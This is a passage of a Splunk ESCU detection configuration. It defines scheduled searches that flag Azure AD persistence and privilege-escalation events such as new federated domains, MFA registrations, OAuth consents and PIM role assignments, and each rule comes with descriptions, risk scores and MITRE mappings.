Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = In most organizations, new customm domains will be updated infrequently. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New Custom Domain Added - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new custom domain, $domain$ , was added by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New Custom Domain Added - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.notable.param.rule_title = Azure AD New Custom Domain Added action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add unverified domain" properties.result=success | rename properties.* as * | rename targetResources{}.displayName as domain | stats count min(_time) as firstTime max(_time) as lastTime by user, domain, result, operationName, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_custom_domain_added_filter` [ESCU - Azure AD New Federated Domain Added - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = In most organizations, domain federation settings will be updated infrequently. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New Federated Domain Added - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new federated domain, $domain$ , was added by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New Federated Domain Added - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484", "T1484.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.notable.param.rule_title = Azure AD New Federated Domain Added action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Set domain authentication" "properties.result"=success | rename properties.* as * | rename targetResources{}.displayName as domain | stats count min(_time) as firstTime max(_time) as lastTime by user, domain, result, operationName, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_federated_domain_added_filter` [ESCU - Azure AD New MFA Method Registered - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Azure Active Directory by monitoring Azure AD audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Azure Active Directory by monitoring Azure AD audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Users may register MFA methods legitimally, investigate and filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New MFA Method Registered - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new MFA method was registered for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New MFA Method Registered - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects the registration of a new Multi-Factor Authentication (MFA) method associated with a user account within Azure Active Directory by monitoring Azure AD audit logs and configurations. While adding a new MFA method can be a routine and legitimate action, it can also be indicative of an attacker's attempt to maintain persistence on a compromised account. By registering a new MFA method, attackers can potentially bypass existing security measures, allowing them to authenticate using stolen credentials without raising alarms. Monitoring for such changes is crucial, especially if the addition is not preceded by a user request or if it deviates from typical user behavior. If an attacker successfully registers a new MFA method on a compromised account, they can solidify their access, making it harder for legitimate users to regain control. The attacker can then operate with the privileges of the compromised account, potentially accessing sensitive data, making unauthorized changes, or even escalating their privileges further. Immediate action would be required to verify the legitimacy of the MFA change and, if malicious, to remediate and secure the affected account. action.notable.param.rule_title = Azure AD New MFA Method Registered action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Update user" | rename properties.* as * | eval propertyName = mvindex('targetResources{}.modifiedProperties{}.displayName', 0) | search propertyName = StrongAuthenticationMethod | eval oldvalue = mvindex('targetResources{}.modifiedProperties{}.oldValue',0) | eval newvalue = mvindex('targetResources{}.modifiedProperties{}.newValue',0) | rex field=newvalue max_match=0 "(?i)(?\"MethodType\")" | rex field=oldvalue max_match=0 "(?i)(?\"MethodType\")" | eval count_new_method_type = coalesce(mvcount(new_method_type), 0) | eval count_old_method_type = coalesce(mvcount(old_method_type), 0) | stats earliest(_time) as firstTime latest(_time) as lastTime values(propertyName) by user newvalue oldvalue | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_mfa_method_registered_filter` [ESCU - Azure AD New MFA Method Registered For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account. Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account. Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLogs log category. action.escu.known_false_positives = Newly onboarded users who are registering an MFA method for the first time will also trigger this detection. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD New MFA Method Registered For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Compromised User Account", "Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new MFA method was registered for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD New MFA Method Registered For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account. Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence. action.notable.param.rule_title = Azure AD New MFA Method Registered For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=AuditLogs operationName="User registered security info" properties.operationType=Add | rename properties.* as * | rename targetResources{}.* as * | stats count min(_time) as firstTime max(_time) as lastTime by user, resultDescription, result, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_new_mfa_method_registered_for_user_filter` [ESCU - Azure AD OAuth Application Consent Granted By User - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects when a user in an Azure AD environment grants consent to an OAuth application, capturing any consent granted regardless of the specific permissions requested. Utilizing Azure AD audit logs, it focuses on events related to OAuth application consents, alerting security teams to instances where users actively grant consent to applications. This monitoring is crucial as it highlights potential risks associated with third-party applications gaining access to organizational data, a tactic often exploited by malicious actors to gain unauthorized access. A true positive from this analytic necessitates immediate investigation to validate the application's legitimacy, review the granted permissions, and assess potential risks, helping to prevent unauthorized access and protect sensitive data and resources. While false positives may occur with legitimate application integrations, ensuring alignment with organizational policies and security best practices is paramount. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic detects when a user in an Azure AD environment grants consent to an OAuth application, capturing any consent granted regardless of the specific permissions requested. Utilizing Azure AD audit logs, it focuses on events related to OAuth application consents, alerting security teams to instances where users actively grant consent to applications. This monitoring is crucial as it highlights potential risks associated with third-party applications gaining access to organizational data, a tactic often exploited by malicious actors to gain unauthorized access. A true positive from this analytic necessitates immediate investigation to validate the application's legitimacy, review the granted permissions, and assess potential risks, helping to prevent unauthorized access and protect sensitive data and resources. While false positives may occur with legitimate application integrations, ensuring alignment with organizational policies and security best practices is paramount. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = False positives may occur if users are granting consents as part of legitimate application integrations or setups. It is crucial to review the application and the permissions it requests to ensure they align with organizational policies and security best practices. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD OAuth Application Consent Granted By User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ consented an OAuth application. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD OAuth Application Consent Granted By User - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1528"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects when a user in an Azure AD environment grants consent to an OAuth application, capturing any consent granted regardless of the specific permissions requested. Utilizing Azure AD audit logs, it focuses on events related to OAuth application consents, alerting security teams to instances where users actively grant consent to applications. This monitoring is crucial as it highlights potential risks associated with third-party applications gaining access to organizational data, a tactic often exploited by malicious actors to gain unauthorized access. A true positive from this analytic necessitates immediate investigation to validate the application's legitimacy, review the granted permissions, and assess potential risks, helping to prevent unauthorized access and protect sensitive data and resources. While false positives may occur with legitimate application integrations, ensuring alignment with organizational policies and security best practices is paramount. action.notable.param.rule_title = Azure AD OAuth Application Consent Granted By User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Consent to application" properties.result=success | rename properties.* as * | eval permissions_index = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions") >= 0, mvfind('targetResources{}.modifiedProperties{}.displayName', "ConsentAction.Permissions"), -1) | eval permissions = mvindex('targetResources{}.modifiedProperties{}.newValue',permissions_index) | rex field=permissions "Scope: (?[^,]+)" | stats count min(_time) as firstTime max(_time) as lastTime by operationName, user, Scope | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_oauth_application_consent_granted_by_user_filter` [ESCU - Azure AD PIM Role Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds active assignment for the role. While PIM can be leveraged as a powerful security control, it may also abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds active assignment for the role. While PIM can be leveraged as a powerful security control, it may also abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = As part of legitimate administrative behavior, users may be assigned PIM roles. Filter as needed action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD PIM Role Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = An Azure AD PIM role assignment was assiged to $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD PIM Role Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds active assignment for the role. While PIM can be leveraged as a powerful security control, it may also abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy. action.notable.param.rule_title = Azure AD PIM Role Assigned action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add eligible member to role in PIM completed*" | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user values(targetResources{}.displayName) as displayName by result, operationName, initiatedBy.user.displayName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_pim_role_assigned_filter` [ESCU - Azure AD PIM Role Assignment Activated - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds active assignment for the role. While PIM can be leveraged as a powerful security control, it may also abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds active assignment for the role. While PIM can be leveraged as a powerful security control, it may also abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = As part of legitimate administrative behavior, users may activate PIM roles. Filter as needed action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD PIM Role Assignment Activated - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = An Azure AD PIM role assignment was activated by $initiatedBy$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD PIM Role Assignment Activated - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of the Azure AD PIM role. Privileged Identity Management (PIM) is a service within Azure Azure AD that enables administrators to manage, control, and monitor access to sensitive resources. PIM provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources. Once a user has been made eligible for an administrative role, she must activate this role assignment to perform the privileged actions. When a role is activated, Azure AD PIM temporarily adds active assignment for the role. While PIM can be leveraged as a powerful security control, it may also abused by adversaries to obtain privileged access. Security teams should monitor for the assignment and activation of PIM roles and validate their legitimacy. action.notable.param.rule_title = Azure AD PIM Role Assignment Activated action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add member to role completed (PIM activation)" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user values(targetResources{}.displayName) as displayName by initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_pim_role_assignment_activated_filter` [ESCU - Azure AD Privileged Authentication Administrator Role Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of the Privileged Authentication Administrato role to an Azure AD user. Users in this role can set or reset authentication methods for any user in Azure Active Directory, including privileged roles like Global Administrators. Users with this role can change credentials for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the credentials of a user may mean the ability to assume that users identity and permissions. Red teams and adversaries alike may abuse this role to escalate their privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = The following analytic identifies the assignment of the Privileged Authentication Administrato role to an Azure AD user. Users in this role can set or reset authentication methods for any user in Azure Active Directory, including privileged roles like Global Administrators. Users with this role can change credentials for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the credentials of a user may mean the ability to assume that users identity and permissions. Red teams and adversaries alike may abuse this role to escalate their privileges. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Administrators may legitimately assign the Privileged Authentication Administrator role as part of administrative tasks. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Privileged Authentication Administrator Role Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = The privileged Azure AD role Privileged Authentication Administrator was assigned for User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Privileged Authentication Administrator Role Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": 